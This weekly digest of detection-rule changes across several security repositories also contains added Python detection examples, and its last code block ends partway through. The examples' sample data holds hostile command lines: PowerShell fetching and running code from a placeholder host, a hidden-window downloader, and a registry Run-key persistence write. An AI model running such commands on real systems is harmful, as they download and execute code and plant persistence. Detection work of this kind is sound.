Detections Digest #20250609
The issue highlights key changes from 8 GitHub repositories for the week of Jun 2 to Jun 9, 2025, covering 67 new and 77 modified detection rules.
This week's update highlights the most significant changes to detection rules from 8 of the 40+ monitored GitHub repositories. Between Jun 2 and Jun 9, 2025, contributors added 67 new rules and updated 77 existing ones.
Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.
Key Takeaways
New detections identify reconnaissance and initial access in cloud environments. These rules monitor for risky sign-ins via Entra ID Protection, anomalous O365 session activity, and the use of tools like BloodHound to map Azure AD. (elastic/detection-rules, splunk/security_content)
Detections for credential access were added, targeting methods across multiple platforms. New rules spot access to browser and crypto wallet files, DPAPI key exports, registry hive dumping, and LSASS memory access. (SigmaHQ/sigma, splunk/security_content, elastic/protections-artifacts, anvilogic-forge/armory)
Coverage for .NET-based threats was expanded to include ARM architectures. Several rules were modified to monitor 'FrameworkArm' and 'FrameworkArm64' directories for suspicious binary creation, DLL sideloading, and abuse of .NET utilities. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules)
Detections for PowerShell obfuscation and abuse were improved across several repositories. New and updated rules identify character-based obfuscation, headless execution, base64 decoding, and hidden command-line arguments. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules, elastic/protections-artifacts, SlimKQL/Hunting-Queries-Detection-Rules)
Several repositories added detections for unauthorized Remote Access Tool (RAT) installation and execution. These rules identify service installations and processes associated with Ammy Admin, SimpleHelp, and NetSupport RAT. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules, anvilogic-forge/armory, SlimKQL/Hunting-Queries-Detection-Rules)
Detections for Linux and macOS threats were introduced, focusing on reconnaissance, persistence, and defense evasion. These include rules for suspicious syscalls, SSH backdoors, LKM configuration, and password validation checks on macOS. (SigmaHQ/sigma, elastic/detection-rules, elastic/protections-artifacts, anvilogic-forge/armory, SlimKQL/Hunting-Queries-Detection-Rules)
A significant number of new and modified rules focus on advanced Windows defense evasion techniques. These detections target low-level behaviors like direct syscalls, ROP gadgets, memory manipulation, and shellcode injection to bypass security controls. (elastic/protections-artifacts)
🔔 All new and modified rules in this digest are available in structured, machine-readable STIX/TAXII intelligence feeds from our partners at CTIChef.com.
Load the feeds into your SIEM, TIP, or SOAR for ready-to-use detections and to connect them directly to the threats you're already tracking.
Table Of Contents
Corporate repositories (7)
  splunk/security_content (✎3)
  sublime-security/sublime-rules (+5, ✎10)
  SigmaHQ/sigma (+25, ✎14)
  Yamato-Security/hayabusa-rules (+16, ✎13)
  elastic/detection-rules (+4, ✎1)
  anvilogic-forge/armory (+2)
  elastic/protections-artifacts (+13, ✎36)
Personal repositories (1)
  SlimKQL/Hunting-Queries-Detection-Rules (+2)
Corporate repositories (7)
splunk/security_content (✎3)
✎ Modified rules
The 'Concurrent Sessions from Multiple IPs' rule has been updated to include SessionId in the stats command and a new filter macro, improving detection of adversary-in-the-middle (AiTM) phishing attacks in Office 365. (O365 Concurrent Sessions From Different Ips)
The 'Internal Host Port Scanning' rule has been updated to clarify supported firewalls (e.g., Cisco Secure Firewall) and to correct the risk object to 'dest_ports', which improves accuracy when detecting reconnaissance activities. (Internal Horizontal Port Scan NMAP Top 20)
The 'Registry Hives Export via reg.exe' rule has been updated to broaden the scope of monitored registry paths, which improves detection of potential offline credential access attacks. (Windows Sensitive Registry Hive Dump Via CommandLine)
sublime-security/sublime-rules (+5, ✎10)
+ New rules
Multiple new rules expand detection of phishing attacks. These rules focus on Cloudflare CAPTCHA redirects, malformed URL prefixes used to evade scanners, HTML smuggling in calendar invites, bananaguide.com redirects, and impersonated email system notifications. The rules examine email content, attachments, and links for malicious patterns. (Suspicious attachment with unscannable Cloudflare link, Malformed URL prefix, Attachment: HTML smuggling with eval and atob via calendar invite, Open Redirect: bananaguide.com, Credential phishing: Email delivery failure impersonation)
✎ Modified rules
Rules for detecting email-based phishing attacks using images have been improved. These changes expand the coverage to identify images used in the HTML body, including those with content IDs, enhancing detection of malicious attachments and QR code lures. (Brand impersonation: Microsoft (QR code), Brand Impersonation: Fake Fax)
Detection of brand impersonation in emails has been updated. 'Sharepoint file sharing email impersonation' now spots specific text patterns and branding elements. 'Adobe brand impersonation' was improved with checks for the term "adobe," related file sharing topics, and better sender reputation analysis using time since last contact. (Brand impersonation: Sharepoint fake file share, Brand impersonation: Adobe with suspicious language and link)
Updates to rules detecting credential phishing and reconnaissance attempts refine logic for identifying suspicious emails. The 'credential phishing' rule improves handling of email addresses in disclaimers. The 'reconnaissance attempts' rule extracts and analyzes the "real subject" to ignore external warning keywords. (Credential phishing: Engaging language and other indicators (untrusted sender), Reconnaissance: All recipients cc/bcc'd or undisclosed)
Improved rules target credential theft via DocuSign and OneDrive impersonation. The DocuSign rule ignores link count when HTML is padded with whitespace and broadens detection of DocuSign Blue Box templates. The OneDrive rule includes checks for OneDrive language in attachment file names, improved link analysis, and OCR analysis of message screenshots. (Brand Impersonation: Fake DocuSign HTML table not linking to DocuSign domains, Credential phishing: Onedrive impersonation)
Rules detecting compromised GovDelivery accounts and unscannable links have been updated. The GovDelivery rule now checks if header domains have 'govdelivery.com' as the root domain and if SPF/DMARC passes. The unscannable links rule includes SSA in the list of suspicious sender display names and switches to profile.by_sender_email() to check if the sender is unsolicited. (Vendor Compromise: GovDelivery Message With Suspicious Link, Suspicious message with unscannable Cloudflare link)
🔔 We’re also posting weekly digest summaries and product updates on LinkedIn!
SigmaHQ/sigma (+25, ✎14)
+ New rules
New rules spot uncommon processes accessing sensitive Chromium browser and cryptocurrency wallet files, plus file activity whose names match DPAPI backup keys or certificate exports, both of which may signal credential theft. (Access To Chromium Browsers Sensitive Files By Uncommon Applications, Access To Crypto Currency Wallets By Uncommon Applications, DPAPI Backup Keys And Certificate Export Activity IOC)
Several new rules track remote RPC calls for gathering event logs, task scheduling data, and potential abuse of the remote encryption service, which can expose reconnaissance and lateral movement attempts. (Remote Event Log Recon, Remote Schedule Task Recon via ITaskSchedulerService, Remote Schedule Task Lateral Movement via ITaskSchedulerService, Remote Server Service Abuse for Lateral Movement, Recon Activity via SASec)
New rules provide detection of Kubernetes deployment removals and container creations with hostPath mounts. The former is tied to potential disruptive activity, the latter to privilege escalation. (Container With A hostPath Mount Created, Deployment Deleted From Kubernetes Cluster)
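The hostPath rule above keys on the pod spec inside a Kubernetes audit-log record. The following Python is an added example, not code from the digest or from the Sigma repository: it parses constructed audit events in the shape the Kubernetes API server emits (verb, objectRef, requestObject), pulls the pod spec out of a direct pod create or out of a controller's pod template (the controller handling and the risk tiers are this example's own extension of the rule), and reports every hostPath volume it finds.

```python
# Constructed Kubernetes audit-log records (not real events, not from the digest or Sigma).
SAMPLE_AUDIT = [
    {   # a pod that mounts the node's root filesystem: classic container-escape setup
        "verb": "create",
        "user": {"username": "dev@example.com"},
        "objectRef": {"resource": "pods", "namespace": "default", "name": "debug-shell"},
        "requestObject": {"spec": {
            "volumes": [{"name": "host", "hostPath": {"path": "/", "type": "Directory"}}],
            "containers": [{"name": "sh", "image": "alpine",
                            "volumeMounts": [{"name": "host", "mountPath": "/host"}]}],
        }},
    },
    {   # a Deployment whose pod template mounts the container runtime socket
        "verb": "create",
        "user": {"username": "ci-bot"},
        "objectRef": {"resource": "deployments", "namespace": "build", "name": "runner"},
        "requestObject": {"spec": {"template": {"spec": {
            "volumes": [{"name": "dock", "hostPath": {"path": "/var/run/docker.sock"}}],
            "containers": [{"name": "runner", "image": "runner:1"}],
        }}}},
    },
    {   # benign: emptyDir only
        "verb": "create",
        "user": {"username": "app-deployer"},
        "objectRef": {"resource": "pods", "namespace": "web", "name": "api-1"},
        "requestObject": {"spec": {
            "volumes": [{"name": "scratch", "emptyDir": {}}],
            "containers": [{"name": "api", "image": "api:2"}],
        }},
    },
    {   # a read is not a create and carries no requestObject; must be ignored
        "verb": "get",
        "user": {"username": "dev@example.com"},
        "objectRef": {"resource": "pods", "namespace": "default", "name": "debug-shell"},
    },
]

WORKLOADS = {"pods", "deployments", "daemonsets", "statefulsets", "replicasets", "jobs", "cronjobs"}
# Host paths that hand a container the node or its credentials (this example's own list).
HIGH_RISK_PATHS = ("/etc", "/root", "/proc", "/sys", "/var/run/docker.sock",
                   "/run/containerd", "/var/lib/kubelet")


def pod_spec(event):
    """Return the pod spec from a workload create, or None if the event is not one."""
    if event.get("verb") != "create":
        return None
    if event.get("objectRef", {}).get("resource") not in WORKLOADS:
        return None
    spec = event.get("requestObject", {}).get("spec", {})
    if "template" in spec:          # Deployment / DaemonSet / StatefulSet / ReplicaSet / Job
        spec = spec["template"].get("spec", {})
    elif "jobTemplate" in spec:     # CronJob nests one level deeper
        spec = spec["jobTemplate"].get("spec", {}).get("template", {}).get("spec", {})
    return spec


def risk_of(path):
    """'high' for the host root or a known sensitive path, 'medium' for any other hostPath."""
    p = path.rstrip("/") or "/"
    if p == "/":
        return "high"
    for sensitive in HIGH_RISK_PATHS:
        if p == sensitive or p.startswith(sensitive + "/"):
            return "high"
    return "medium"


def detect_hostpath_mounts(events):
    """One finding per hostPath volume declared in a workload creation."""
    findings = []
    for event in events:
        spec = pod_spec(event)
        if not spec:
            continue
        ref = event["objectRef"]
        for volume in spec.get("volumes", []):
            if "hostPath" not in volume:
                continue
            path = volume["hostPath"].get("path", "")
            findings.append({
                "user": event.get("user", {}).get("username"),
                "resource": f'{ref["resource"]}/{ref.get("namespace")}/{ref.get("name")}',
                "volume": volume["name"],
                "host_path": path,
                "risk": risk_of(path),
            })
    return findings


if __name__ == "__main__":
    for finding in detect_hostpath_mounts(SAMPLE_AUDIT):
        print(finding)
```

Pods created by a Deployment also show up as their own pod-create events (by the replicaset controller's service account), so a rule that only inspects `objectRef.resource: pods` still sees them; looking at the controller's template additionally attributes the mount to the human or CI identity that submitted it.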
New rules detect execution of Ammy Admin, service installs of remote access tools, RDP connections from suspicious locations, and executables launched from external WebDAV shares. These are often used to maintain persistence or gain initial access. (Remote Access Tool - Ammy Admin Agent Execution, Remote Access Tool Services Have Been Installed - Security, Mstsc.EXE Execution From Uncommon Parent, Suspicious External WebDAV Execution)
Two new rules monitor Linux systems for the mknod and sysinfo syscalls. The mknod syscall creates special files such as named pipes, a common building block of reverse-shell backdoors, while the sysinfo syscall can indicate system fingerprinting for reconnaissance. (Special File Creation via Mknod Syscall, System Info Discovery via Sysinfo Syscall)
✎ Modified rules
Expanded coverage for .NET Framework threats through updates to multiple rules. These updates include 'FrameworkArm' and 'FrameworkArm64' directories in detection logic for binary creation, DLL sideloading, AddInUtil.exe execution, aspnet_compiler.exe execution, and PowerShell DLL loading. The changes address potential dropper activities and broader .NET component locations. (Creation of an Executable by an Executable, Potential DLL Sideloading Of MsCorSvc.DLL, AddinUtil.EXE Execution From Uncommon Directory, AspNetCompiler Execution, Potentially Suspicious ASP.NET Compilation Via AspNetCompiler, PowerShell Core DLL Loaded By Non PowerShell Process)
Rules for detecting double extension file execution have been updated with broader extension coverage to better identify spear phishing attempts that disguise malicious files as documents or media. (Suspicious Double Extension Files, Suspicious Double Extension File Execution)
The detection of PowerShell obfuscation techniques is improved by adding [char]0x to the character-based obfuscation rule, enhancing coverage for defense evasion tactics. (Potential PowerShell Obfuscation Via WCHAR/CHAR)
Detection of local group enumeration on Linux systems is improved by including '/ed', '/less', '/nano', '/vi', '/vim' binaries to monitored images. This enhances visibility into adversary reconnaissance activities. (Local Groups Discovery - Linux)
Coverage improved for varied attack vectors. The 'Service Account Modification' rule now includes additional MITRE ATT&CK IDs. The 'DLL Sideloading' rule adds the 'C:\Windows\SyChpe32' directory. The 'Syslog Action Clear' rule switches to syslog syscall detection. The 'Web Application Command Execution' rule incorporates execveat syscall monitoring. (Azure Kubernetes Service Account Modified or Deleted, Potential System DLL Sideloading From Non System Locations, Clear or Disable Kernel Ring Buffer Logs via Syslog Syscall, Webshell Remote Command Execution)
Yamato-Security/hayabusa-rules (+16, ✎13)
+ New rules
New rules identify suspicious child processes of 'pc-app.exe', possibly signaling PaperCut compromise, and processes spawned by web servers (cmd.exe, powershell.exe, wscript.exe), which could indicate webshell activity or exploitation. (Suspicious Process By Web Server Process, PaperCut MF/NG Potential Exploitation)
New rules detect PowerShell commands run from a hidden ConHost window using the '--headless' flag, and command-line obfuscation that uses Unicode characters. (Powershell Executed From Headless ConHost Process, Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image)
Rules added to detect execution of 'BitLockerToGo.EXE', often abused by malware like Lumma stealer, and the Ammy Admin RMM agent. (BitLockerTogo.EXE Execution, Remote Access Tool - Ammy Admin Agent Execution)
Two rules detect the execution of the BCP utility to export data from databases. This is a technique used by attackers to extract malware saved within database columns or tables. (Data Export From MSSQL Table Via BCP.EXE, Data Export From MSSQL Table Via BCP.EXE)
Several new rules identify suspicious system activity. These include the execution of scripts using the Adobe Creative Cloud Node executable, obfuscated PowerShell installing MSI packages, DNS queries from QuickAssist.exe, suspicious RDP connections, uncommon file downloads from Microsoft domains, rogue ODBC driver registrations, and unusual files written to the Windows Fonts directory. (Node Process Executions, Obfuscated PowerShell MSI Install via WindowsInstaller COM, Obfuscated PowerShell MSI Install via WindowsInstaller COM, DNS Query Request By QuickAssist.EXE, Mstsc.EXE Execution From Uncommon Parent, Suspicious Download from Office Domain, Potentially Suspicious ODBC Driver Registered, Writing Of Malicious Files To The Fonts Folder)
✎ Modified rules
Several rules were updated to expand coverage for .NET Framework ARM and ARM64 architectures. This includes detections for AddInUtil.exe execution from non-standard directories, suspicious aspnet_compiler.exe paths, potential DLL sideloading of mscorsvc.dll, WSMAN provider use, PowerShell DLL loading by non-PowerShell processes, and executable creation. (AddinUtil.EXE Execution From Uncommon Directory, Potentially Suspicious ASP.NET Compilation Via AspNetCompiler, Potential DLL Sideloading Of MsCorSvc.DLL, Suspicious WSMAN Provider Image Loads, PowerShell Core DLL Loaded By Non PowerShell Process, Creation of an Executable by an Executable)
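Both the SigmaHQ/sigma and the Yamato-Security/hayabusa-rules updates above come down to one change: the allowlist of legitimate .NET runtime directories gained the ARM variants, so a genuine mscorsvc.dll, AddInUtil.exe or aspnet_compiler.exe under FrameworkArm64 stops looking like a sideload or a LOLBin dropped somewhere odd. The Python below is an added example, not code from the digest or from either repository: it evaluates constructed image-load events against the old and the new allowlist so the false positive on a Windows-on-ARM host is visible. The exact path pattern is this example's approximation of the rules' logic, and the v4.0.30319 directory under FrameworkArm64 is an assumed sample path.

```python
import re

# Constructed image-load / process-start events (not from the digest or the rule repositories).
SAMPLE_EVENTS = [
    {"host": "x64-ws01",   "path": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll"},
    {"host": "arm64-ws02", "path": r"C:\Windows\Microsoft.NET\FrameworkArm64\v4.0.30319\mscorsvc.dll"},
    {"host": "x64-ws01",   "path": r"C:\Users\Public\Libraries\mscorsvc.dll"},
    {"host": "x64-ws03",   "path": r"C:\Users\alice\AppData\Local\Temp\aspnet_compiler.exe"},
    {"host": "x64-ws01",   "path": r"C:\Windows\System32\kernel32.dll"},
]

# Runtime roots under <drive>:\Windows\Microsoft.NET\. The pre-update rules only knew the
# first two; the ARM directories are the ones added this week.
DOTNET_ROOTS_OLD = ("Framework", "Framework64")
DOTNET_ROOTS_NEW = DOTNET_ROOTS_OLD + ("FrameworkArm", "FrameworkArm64")

# Binaries the updated rules treat as suspicious when they run or load outside those roots.
WATCHED_BINARIES = {"mscorsvc.dll", "addinutil.exe", "aspnet_compiler.exe"}


def dotnet_runtime_pattern(roots):
    """Regex for '<drive>:\\Windows\\Microsoft.NET\\<root>\\v<a>.<b>.<c>\\' with any of the roots."""
    alternatives = "|".join(re.escape(root) for root in roots)
    return re.compile(
        rf"^[a-z]:\\windows\\microsoft\.net\\(?:{alternatives})\\v\d+\.\d+\.\d+\\", re.I
    )


def is_dotnet_runtime_path(path, roots=DOTNET_ROOTS_NEW):
    """True when the path sits inside an allowlisted .NET Framework runtime directory."""
    return dotnet_runtime_pattern(roots).match(path) is not None


def flag_events(events, roots=DOTNET_ROOTS_NEW):
    """Return events where a watched .NET binary is outside the allowlisted runtime roots."""
    flagged = []
    for event in events:
        name = event["path"].rsplit("\\", 1)[-1].lower()
        if name in WATCHED_BINARIES and not is_dotnet_runtime_path(event["path"], roots):
            flagged.append(event)
    return flagged


if __name__ == "__main__":
    for label, roots in (("before update", DOTNET_ROOTS_OLD), ("after update", DOTNET_ROOTS_NEW)):
        hits = flag_events(SAMPLE_EVENTS, roots)
        print(f"{label}: {len(hits)} flagged")
        for hit in hits:
            print("   ", hit["host"], hit["path"])
```

With the old roots the legitimate ARM64 load is the third hit; with the new roots only the Public\Libraries copy of mscorsvc.dll and the aspnet_compiler.exe in a user's Temp remain, which is the behaviour the modified rules now have.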
The rules 'Suspicious Double Extension Files' and both variants of 'Suspicious Double Extension File Execution', which detect an .exe extension following a non-executable extension (for example .pdf.exe), optionally padded with spaces or underscores to cloak the executable in spear-phishing campaigns, were updated to include additional file extensions. This helps catch malware that abuses Windows hiding known file extensions by default. The level on two of the rules was changed from critical to high. (Suspicious Double Extension Files, Suspicious Double Extension File Execution, Suspicious Double Extension File Execution)
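To show what those double-extension rules (the SigmaHQ/sigma and Yamato-Security/hayabusa-rules updates above) are matching, here is an added Python example that is not code from the digest or from either repository. It classifies constructed file names into the lure extension the victim is meant to see, the padding that pushes the real extension out of view, and the extension that actually executes, and shows what Explorer displays with "Hide extensions for known file types" on. The extension lists are this example's own, not the rules' exact lists.

```python
import re

# Extensions a victim is meant to notice, and the ones that actually execute (example's own lists).
LURE_EXTENSIONS = ("pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "rtf", "txt",
                   "jpg", "jpeg", "png", "gif", "mp3", "mp4", "avi", "zip", "rar", "7z")
EXEC_EXTENSIONS = ("exe", "scr", "pif", "com", "bat", "cmd", "js", "vbs", "hta")

DOUBLE_EXTENSION = re.compile(
    r"\.(?P<lure>" + "|".join(LURE_EXTENSIONS) + r")"
    r"(?P<padding>[ _]*)"      # spaces/underscores that push the real extension out of view
    r"\.(?P<real>" + "|".join(EXEC_EXTENSIONS) + r")$",
    re.IGNORECASE,
)

# Constructed sample names, not taken from any campaign or rule test data.
SAMPLE_NAMES = [
    "Invoice_2025.pdf.exe",
    "Report.docx" + "_" * 12 + ".scr",
    "holiday.jpg .exe",
    "setup.exe",
    "archive.tar.gz",
    "notes.txt",
]


def classify(filename):
    """Return lure/real extensions and padding length, or None for a normal file name."""
    match = DOUBLE_EXTENSION.search(filename)
    if match is None:
        return None
    return {
        "lure": match.group("lure").lower(),
        "real": match.group("real").lower(),
        "padding_len": len(match.group("padding")),
    }


def as_displayed(filename):
    """What Explorer shows when known extensions are hidden: the final extension is dropped."""
    stem, dot, _ext = filename.rpartition(".")
    return stem if dot else filename


def scan(filenames):
    """(name, classification) for every double-extension name in the list."""
    results = []
    for name in filenames:
        verdict = classify(name)
        if verdict is not None:
            results.append((name, verdict))
    return results


if __name__ == "__main__":
    for name, verdict in scan(SAMPLE_NAMES):
        print(f"{name!r:40} shown as {as_displayed(name)!r:30} -> {verdict}")
```

The padding group is the reason the rules list both ".pdf.exe" style strings and "spaces or underlines": the regex treats both as one pattern with a measurable gap, and the gap length is itself a useful severity hint.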
The level of both 'File Decoded From Base64/Hex Via Certutil.EXE' rules, which detect certutil run with the "decode" or "decodehex" flags to decode base64- or hex-encoded files, was changed from medium to high. (File Decoded From Base64/Hex Via Certutil.EXE, File Decoded From Base64/Hex Via Certutil.EXE)
Detection for command-line obfuscation was improved. One rule now detects '[char]0x' and another detects Unicode whitespace (Braille Pattern Blank) in PowerShell_ISE. (Potential PowerShell Obfuscation Via WCHAR/CHAR, Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image)
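The two obfuscation tricks named here (the '[char]0x' addition in the SigmaHQ/sigma and hayabusa WCHAR/CHAR rules, and the Braille Pattern Blank in the hayabusa Unicode rule) are easier to reason about when you can see what the command line resolves to. The Python below is an added example, not code from the digest or from either repository: it finds runs of `[char]` casts in a constructed command line and decodes them to the string they build at runtime, and it counts look-alike whitespace code points. The regexes are this example's approximation of the rules' string matches, and the whitespace list beyond U+2800 is this example's own addition.

```python
import re
import unicodedata

# One [char]<n> cast; <n> is hex (0x69) or decimal (105).
CHAR_TOKEN = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)
# A run of casts joined with '+', e.g. [char]0x69+[char]0x65+[char]0x78
CHAR_RUN = re.compile(r"(?:\[char\]\s*(?:0x[0-9a-f]+|\d+)\s*(?:\+\s*)?)+", re.I)

# Code points that render as a blank (or nothing) but are not U+0020. The hayabusa rule keys on
# U+2800; the others are this example's additions.
LOOKALIKE_WHITESPACE = ("\u2800", "\u00a0", "\u2002", "\u2003", "\u2009", "\u200b", "\u3000")

# Constructed command lines (not from the digest, the rules, or any real sample).
SAMPLES = {
    "char_cast": "powershell.exe -nop -c \"& ([char]0x69+[char]0x65+[char]0x78) "
                 "((New-Object Net.WebClient).DownloadString('http://example.invalid/a'))\"",
    "decimal_cast": "powershell.exe -c \"&([char]105+[char]101+[char]120) 'whoami'\"",
    "braille": "powershell_ise.exe -c \"Invoke-WebRequest\u2800\u2800http://example.invalid/b\"",
    "benign": "powershell.exe -File C:\\scripts\\backup.ps1",
}


def decode_char_runs(text):
    """Resolve each run of [char] casts to the string it produces."""
    decoded = []
    for run in CHAR_RUN.finditer(text):
        codes = CHAR_TOKEN.findall(run.group(0))
        chars = [chr(int(code, 16 if code.lower().startswith("0x") else 10)) for code in codes]
        decoded.append("".join(chars))
    return decoded


def lookalike_whitespace(text):
    """Map Unicode name -> count for each look-alike whitespace code point present."""
    return {unicodedata.name(ch): text.count(ch) for ch in LOOKALIKE_WHITESPACE if ch in text}


def assess(cmdline):
    """Indicators plus the decoded evidence a triager would want next to the alert."""
    indicators = []
    if CHAR_TOKEN.search(cmdline):
        indicators.append("char-cast obfuscation")
    whitespace = lookalike_whitespace(cmdline)
    if "\u2800" in cmdline:
        indicators.append("braille blank whitespace")
    elif whitespace:
        indicators.append("non-ascii whitespace")
    return {"indicators": indicators, "decoded": decode_char_runs(cmdline), "whitespace": whitespace}


if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        print(label, assess(cmd))
```

Decoding the runs matters for triage: an alert that says "char-cast obfuscation" is an indicator, an alert that says "the casts spell `iex`" is a verdict.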
elastic/detection-rules (+4, ✎1)
+ New rules
New rules detect user and sign-in risk events via Microsoft Entra ID Protection, which flags activities such as anonymized IP addresses, unusual travel patterns, and password spray attacks. (Entra ID Protection - Risk Detection - User Risk, Entra ID Protection - Risk Detection - Sign-in Risk)
A new rule identifies reconnaissance activity in Microsoft cloud environments through the detection of tools like AzureHound, SharpHound, and BloodHound, which are employed to map relationships within Microsoft Entra ID and Microsoft 365. (BloodHound Suite User-Agents Detected)
A new rule identifies removal of access permissions from shared AWS EC2 EBS snapshots, a tactic used to obstruct data recovery. (AWS EC2 EBS Snapshot Access Removed)
✎ Modified rules
The 'Detect LKM Configuration File Creation' rule is updated. It adds /lib/modprobe.d/* to monitored file paths. This extends coverage to additional locations where malicious Loadable Kernel Modules are configured for loading upon reboot, aiding in the detection of persistence mechanisms. (Loadable Kernel Module Configuration File Creation)
anvilogic-forge/armory (+2)
+ New rules
A new rule detects password validation checks on macOS via the dscl command, specifically when executed from unusual processes. This aims to identify potential credential testing attempts by threat actors using tools like Atomic Stealer. (Password Validation Check via DSCL from Uncommon Process - macOS)
A new rule detects installations of Windows services linked to SimpleHelp or JWrapper Remote Access tools. This identifies unauthorized remote access setups by monitoring Windows service installation events for specific binary paths. (SimpleHelp Remote Access Tool Service Installation)
elastic/protections-artifacts (+13, ✎36)
+ New rules
New rules added to detect potential SSH backdoors or post-exploitation activity, identifying the processes started after SSH login and processes spawned by SSH with unusual network connections, which may signal persistence or data exfiltration. (Unusual SSH Parent/Child Execution, Unusual SSH Child Network Connection)
Multiple rules address code injection and privilege escalation techniques. These rules focus on detecting malicious code execution through memory manipulation, kernel driver abuse, and bypassing security measures. (LSASS Memory Read via PPL Bypass, Native API Call from Unsigned Module, Process Explorer Device Access by Unusual Process, Suspicious Memory Protection Change via VirtualProtect)
Two new rules detect PowerShell run with obfuscated content or performing base64 decoding, which is often seen during malware installation. (Execution via Obfuscated PowerShell Script, Suspicious PowerShell Base64 Decoding)
Several rules have been added to detect suspicious command execution or network activity: background task execution on Linux from a hidden process, socat invoked with reverse-shell or listener arguments, connections to AWS S3 by unsigned binaries, scripts executed from a remote WebDAV share, and interactive logons with alternate credentials from an unusual process. (Background Task Execution via a Hidden Process, Socat Reverse Shell or Listener Activity, Suspicious Binary AWS S3 Connection, Script Execution from WebDav, Interactive Logon by a Suspicious Process)
✎ Modified rules
Several rules were updated to improve detection of suspicious process execution, persistence mechanisms, and lateral movement techniques. Updates address execution of system binaries from unusual locations (macOS and Windows), systemd process execution followed by network connections, Dynamic DNS queries by signed Microsoft binaries, network traffic tunneling, HTML application script execution, remote WMI command execution, and execution of native binaries from unusual paths during network logon sessions. The updates include new conditions, exclusions, and process hashes to reduce false positives and increase coverage. (Suspicious XPC Service Child Process, Suspicious PrivilegedHelperTool Activity, Systemd Execution Followed by Network Connection, Connection to Dynamic DNS Provider by a Signed Binary Proxy, Potential Protocol Tunneling via Legit Utilities, Script Execution via Microsoft HTML Application, Suspicious Cmd Execution via WMI, Execution of a File Dropped from SMB, Suspicious Process Execution via Network Logon, Suspicious Execution via Windows Services)
Multiple rules have been modified to refine the detection of code injection and memory manipulation techniques. These rules identify API calls and suspicious call stack patterns indicative of code injection, ROP gadgets, and attempts to evade API monitoring. Updates incorporate additional SHA256 hash exclusions, improved call stack analysis, and adjustments to address false positives related to trusted processes and system components. (LSASS Memory dump via MiniDumpWriteDump, API Call from a Process with a Spoofed Parent, API Call via Jump ROP Gadget, Image Load via Synthetic Stack Spoofing, Potential Library Load via ROP Gadgets, Direct Syscall from Unsigned Module, Potential Shellcode Injection via a WebShell, Shellcode Injection with Parent as Provenance, Execution from Suspicious Stack Trailing Bytes, Suspicious Memory Page Protection, Windows API Call via Indirect Random Syscall, Network Module Loaded from Suspicious Unbacked Memory, Remote Memory Write to Trusted Target Process)
Several rules were updated with added exclusions to reduce false positives. These rules cover a range of malicious behaviors, including parent process spoofing, persistence via registry run keys and scheduled tasks, access token manipulation, process termination via WMI, command shell execution with suspicious arguments, loading Chromium extensions from unusual parent processes, and attempts to escalate privileges. (Parent Process PID Spoofing, Suspicious Parent-Child Relationship, Potential Obfuscated Script Execution, Process Termination from an Unusual WMI Client, RunDLL32/Regsvr32 Loads Dropped Executable, Suspicious Windows Command Shell Execution, Chromium Extension Loaded from Unusual Parent, Startup Persistence from a Browser or Compression Utility Descendant, Self Service Persistence by an Unsigned Process, Suspicious Remote Process Suspend Activity, Scheduled Task Creation by an Unusual Process, Access Token Manipulation via Child Process, Privilege Escalation via SeImpersonatePrivilege)
Personal repositories (1)
SlimKQL/Hunting-Queries-Detection-Rules (+2)
+ New rules
A new rule identifies potential Ottercookie malware activity. This rule spots devices that compress data using 'tar' and then communicate with a United States-based IP address on port 1224, associated with command and control activity. The rule utilizes KQL and Microsoft Defender. (Ottercookie Detection)
A new rule identifies the execution of an obfuscated BAT dropper delivering the NetSupport RAT. The detection triggers when cmd.exe starts a .bat file, which then runs PowerShell with a hidden window, uses Invoke-WebRequest, and modifies the registry to add client32.exe to the Run key. The rule utilizes KQL and Microsoft Defender. (ANY.RUN Obfuscated BAT Dropper Delivers NetSupport RAT post)
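The NetSupport dropper rule is a chain: cmd.exe running a .bat, a hidden-window PowerShell child that downloads, and a Run-key write pointing at client32.exe from that PowerShell or one of its descendants. The rule itself is KQL over Defender tables; the Python below is an added example, not code from the digest, from ANY.RUN or from the SlimKQL repository, that performs the same correlation over constructed process and registry events shaped like DeviceProcessEvents and DeviceRegistryEvents. All paths, URLs and PIDs are made up, and the hidden-window and downloader regexes are this example's own approximation of the rule's string matches.

```python
import re
from collections import defaultdict

# Constructed endpoint telemetry (not real events; not from the digest, ANY.RUN or SlimKQL).
EVENTS = [
    {"kind": "process", "pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"kind": "process", "pid": 200, "ppid": 100, "image": "cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\alice\Downloads\Invoice_2025.bat"'},
    {"kind": "process", "pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"Invoke-WebRequest -Uri http://example.invalid/c.zip "
                "-OutFile $env:APPDATA\\svc\\c.zip; Expand-Archive $env:APPDATA\\svc\\c.zip $env:APPDATA\\svc\""},
    {"kind": "process", "pid": 310, "ppid": 300, "image": "reg.exe",
     "cmdline": r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ '
                r'/d "C:\Users\alice\AppData\Roaming\svc\client32.exe"'},
    {"kind": "registry", "pid": 310, "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Updater", "data": r"C:\Users\alice\AppData\Roaming\svc\client32.exe"},
    # benign: an admin batch file that also launches PowerShell, visible window, no Run-key write
    {"kind": "process", "pid": 400, "ppid": 100, "image": "cmd.exe", "cmdline": r"cmd.exe /c C:\ops\update.bat"},
    {"kind": "process", "pid": 410, "ppid": 400, "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\ops\\fetch.ps1"},
]

HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+(?:h(?:idden)?|1)\b", re.I)   # -w hidden, -WindowStyle Hidden, -w h
DOWNLOADER = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer", re.I)
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run$", re.I)


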